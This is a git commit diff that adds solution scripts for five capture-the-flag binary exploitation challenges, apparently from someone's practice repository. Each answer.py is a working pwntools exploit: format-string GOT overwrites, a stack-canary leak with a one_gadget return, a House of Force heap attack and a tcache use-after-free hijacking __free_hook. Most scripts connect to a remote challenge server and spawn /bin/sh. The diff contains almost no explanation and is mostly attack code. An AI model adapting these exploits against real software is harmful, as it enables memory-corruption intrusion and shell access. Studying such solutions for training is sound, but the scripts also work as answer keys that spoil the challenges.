Added 5 problems and solutions

2022-05-11 18:07:40 +08:00
parent 272640d3c6
commit 39718ef2c1
16 changed files with 307 additions and 0 deletions
--- a/FormatString/attachment-31/answer.py
+++ b/FormatString/attachment-31/answer.py
@@ -0,0 +1,27 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+
+p = remote("123.57.69.203", 5310)
+# p = process('./attachment-31')
+elf = ELF('./attachment-31')
+
+# gdb_command = ""
+# gdb.attach(p, gdb_command)
+# time.sleep(2)
+
+
+x_addr = int(p.recv(10), 16)
+log.info(hex(x_addr))
+
+for _ in range(3):
+    p.sendline("1")
+p.recvuntil("What's your name?\n")
+payload = fmtstr_payload(10, {x_addr: 9})
+p.sendline(payload)
+
+p.interactive()
--- a/FormatString/attachment-31/attachment-31
+++ b/FormatString/attachment-31/attachment-31
--- a/FormatString/attachment-31/attachment-31.idb
+++ b/FormatString/attachment-31/attachment-31.idb
--- a/FormatString/sp1/answer.py
+++ b/FormatString/sp1/answer.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env python2
+
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "i386",os = "linux", log_level = "debug")
+
+
+p = remote("123.57.69.203", 7010)
+# p = process('./sp1')
+elf = ELF('./sp1')
+# gdb_command = ""
+# gdb.attach(p, gdb_command)
+# time.sleep(1)
+
+printf_got = elf.got['printf']
+
+p.recvuntil('Can you find the magic word?\n')
+p.sendline('%7$s' + p32(printf_got))
+printf_libc = u32(p.recv(4))
+system_libc = printf_libc - 0x000512D0 + 0x0003D200
+
+payload = fmtstr_payload(6, {printf_got: system_libc})
+p.sendline(payload)
+p.sendline("/bin/sh")
+
+p.interactive()
--- a/FormatString/sp1/sp1
+++ b/FormatString/sp1/sp1
--- a/FormatString/sp1/sp1.idb
+++ b/FormatString/sp1/sp1.idb
--- a/FullProtection/attachment-10/answer.py
+++ b/FullProtection/attachment-10/answer.py
@@ -0,0 +1,37 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+
+p = remote("123.57.69.203", 7020)
+# p = process('./attachment-10')
+elf = ELF('./attachment-10')
+# gdb_command = ""
+# gdb.attach(p, gdb_command)
+# time.sleep(2)
+
+
+# Get canary
+p.recvuntil('Hello CTFer! Welcome to the world of pwn~\n')
+p.send('48 ' * 217 + 'a')
+p.recvuntil('0' * 217)
+canary = u64('\x00' + p.recv(7))
+rbp = u64(p.recv(6) + '\x00' * 2)
+log.info('canary: ' + hex(canary))
+log.info('rbp: ' + hex(rbp))
+
+p.send('\x00' * 216 + p64(canary) + p64(rbp - 0xa8) + '\x01') # _IO_2_1_stdout_
+
+# Get address of Libc
+p.recvuntil('Your input is: ')
+libc_base = u64(p.recv(6) + '\x00' * 2) - 0x3ec760 # _IO_2_1_stdout_
+log.info('libc_base: ' + hex(libc_base))
+
+
+one_gadget = libc_base + 0x4f302
+p.send('/bin/sh\x00' + '\x00' * 208 + p64(canary) + p64(rbp) + p64(one_gadget))
+
+p.interactive()
--- a/FullProtection/attachment-10/attachment-10
+++ b/FullProtection/attachment-10/attachment-10
--- a/FullProtection/attachment-10/attachment-10.i64
+++ b/FullProtection/attachment-10/attachment-10.i64
--- a/OtherBin/house_of_force/answer.py
+++ b/OtherBin/house_of_force/answer.py
@@ -0,0 +1,68 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+def choice(data):
+    p.sendline(data)
+
+def new(index, size, data):
+    choice('+++')
+    p.recvuntil("Index:")
+    p.sendline(str(index))
+    p.recvuntil("Size: ")
+    p.sendline(str(size))
+    p.recvuntil("Data: ")
+    p.sendline(data)
+
+def show(index, size):
+    choice('print')
+    p.recvuntil("Index: ")
+    p.sendline(str(index))
+    p.recvuntil("Size: ")
+    p.sendline(str(size))
+
+p = remote("123.57.69.203", 5330)
+# p = process('./attachment-33')
+elf = ELF('./attachment-33')
+
+# gdb_command = ""
+# gdb.attach(p, gdb_command)
+# time.sleep(1)
+
+# House of Force
+
+# Stage 1: Leak libc
+p.sendline("\xff" * 8)
+new(0, 0x18, '\xff' * 0x18 + '\x81\x0d\x00')
+new(1, 0x1008, '\xff' * 0x1008 + '\xf1\x0f\x00')
+show(0, 0x28)
+p.recv(0x20)
+malloc_hook_addr = u64(p.recv(8)) - 0x70
+log.info("malloc_hook addr: " + hex(malloc_hook_addr))
+libc = LibcSearcher('__malloc_hook', malloc_hook_addr)
+libc_base = malloc_hook_addr - libc.dump('__malloc_hook')
+system = libc_base + libc.dump('system')
+log.info('libc_base:' + hex(libc_base))
+log.info('system:' + hex(system))
+
+# Stage 2: Leak heap address
+new(2, 0x1008, '\xff' * 0x1008 + '\xf1\x0f\x00')
+new(3, 0x1008, '\xff' * 0x1008 + '\xf1\x0f\x00')
+new(4, 0x1008, '\xff' * 0x1008 + p64(0xffffffffffffff00))
+show(1, 0x1018)
+p.recv(0x1000)
+p.recv(0x10)
+top_chunk_addr = u64(p.recv(8)) + 0x44000
+log.info("top chunk addr: " + hex(top_chunk_addr))
+
+# Stage 3: Write system_libc to strncmp's GOT entry
+strncmp_got = 0x601018
+new(5, strncmp_got - top_chunk_addr - 0x20, 'a')
+for _ in range(12):
+    new(6, 0x500, "\xff" * 8 + p64(system))
+choice("/bin/sh")
+
+p.interactive()
--- a/OtherBin/house_of_force/attachment-33
+++ b/OtherBin/house_of_force/attachment-33
--- a/OtherBin/house_of_force/attachment-33.i64
+++ b/OtherBin/house_of_force/attachment-33.i64
--- a/TCache/untidy_note/answer.py
+++ b/TCache/untidy_note/answer.py
@@ -0,0 +1,73 @@
+#!/usr/bin/env python2
+# coding = utf-8
+
+from pwn import *
+from LibcSearcher import *
+context(arch = "amd64", os = "linux", log_level = "debug")
+
+def send_choice(choice):
+    p.recvuntil('Your choose is:\n')
+    p.sendline(str(choice))
+
+def create(size):
+    send_choice(1)
+    p.recvuntil('the note size is:\n')
+    p.sendline(str(size))
+
+def delete(index):
+    send_choice(2)
+    p.recvuntil('index:\n\n')
+    p.sendline(str(index))
+
+def edit(index, size, data):
+    send_choice(3)
+    p.recvuntil('index:\n')
+    p.sendline(str(index))
+    p.recvuntil('the size is:\n')
+    p.sendline(str(size))
+    p.recvuntil('Content:\n')
+    p.send(data)
+
+def show(index):
+    send_choice(4)
+    p.recvuntil('index:\n')
+    p.sendline(str(index))
+    p.recvuntil('Content:')
+
+
+p = process('./untidy_note')
+elf = ELF('./untidy_note')
+gdb.attach(p, '')
+
+"""
+The size range of TCache is [0x20, 0x410].
+"""
+
+p.sendline("fuck")
+
+# Step 1: Fake an unsorted bin
+create(0x8)
+for _ in range(0x16):
+    create(0x1f)
+create(0x8)
+
+# Step 2: Leak LibC address by leaking the `fd` field of unsorted bin
+delete(1)
+edit(0, 0x20, '\x00' * 0x18 + p64(0x421))
+delete(1)
+show(1)
+libc_base = u64(p.recv(6) + "\x00\x00") - 0x3ebca0
+log.info('libc_base: ' + hex(libc_base))
+
+# Step 3: TCache Chunk use after free
+free_hook = libc_base + 0x3ed8e8
+edit(1, 0x8, p64(free_hook))
+
+create(0x1f)
+create(0x1f)
+
+system_libc = libc_base + 0x4f420
+edit(0x16, 0x8, "/bin/sh\x00")
+edit(0x17, 0x8, p64(system_libc))
+delete(0x16)
+p.interactive()
--- a/TCache/untidy_note/answer_remote.py
+++ b/TCache/untidy_note/answer_remote.py
@@ -0,0 +1,74 @@
+#!/usr/bin/env python2
+# coding = utf-8
+
+from pwn import *
+from LibcSearcher import *
+context(arch = "amd64", os = "linux", log_level = "debug")
+
+def send_choice(choice):
+    p.recvuntil('Your choose is:\n')
+    p.sendline(str(choice))
+
+def create(size):
+    send_choice(1)
+    p.recvuntil('the note size is:\n')
+    p.sendline(str(size))
+
+def delete(index):
+    send_choice(2)
+    p.recvuntil('index:\n\n')
+    p.sendline(str(index))
+
+def edit(index, size, data):
+    send_choice(3)
+    p.recvuntil('index:\n')
+    p.sendline(str(index))
+    p.recvuntil('the size is:\n')
+    p.sendline(str(size))
+    p.recvuntil('Content:\n')
+    p.send(data)
+
+def show(index):
+    send_choice(4)
+    p.recvuntil('index:\n')
+    p.sendline(str(index))
+    p.recvuntil('Content:')
+
+
+#p = process('./untidy_note')
+p = remote('123.57.69.203', 7030)
+elf = ELF('./untidy_note')
+#gdb.attach(p, '')
+
+"""
+The size range of TCache is [0x20, 0x410].
+"""
+
+p.sendline("fuck")
+
+# Step 1: Fake an unsorted bin
+create(0x8)
+for _ in range(0x16):
+    create(0x1f)
+create(0x8)
+
+# Step 2: Leak LibC address by leaking the `fd` field of unsorted bin
+delete(1)
+edit(0, 0x20, '\x00' * 0x18 + p64(0x421))
+delete(1)
+show(1)
+libc_base = u64(p.recv(6) + "\x00\x00") - 0x3ebca0
+log.info('libc_base: ' + hex(libc_base))
+
+# Step 3: TCache Chunk use after free
+free_hook = libc_base + 0x3ed8e8
+edit(1, 0x8, p64(free_hook))
+
+create(0x1f)
+create(0x1f)
+
+system_libc = libc_base + 0x4f550
+edit(0x16, 0x8, "/bin/sh\x00")
+edit(0x17, 0x8, p64(system_libc))
+delete(0x16)
+p.interactive()
--- a/TCache/untidy_note/untidy_note
+++ b/TCache/untidy_note/untidy_note
--- a/TCache/untidy_note/untidy_note.i64
+++ b/TCache/untidy_note/untidy_note.i64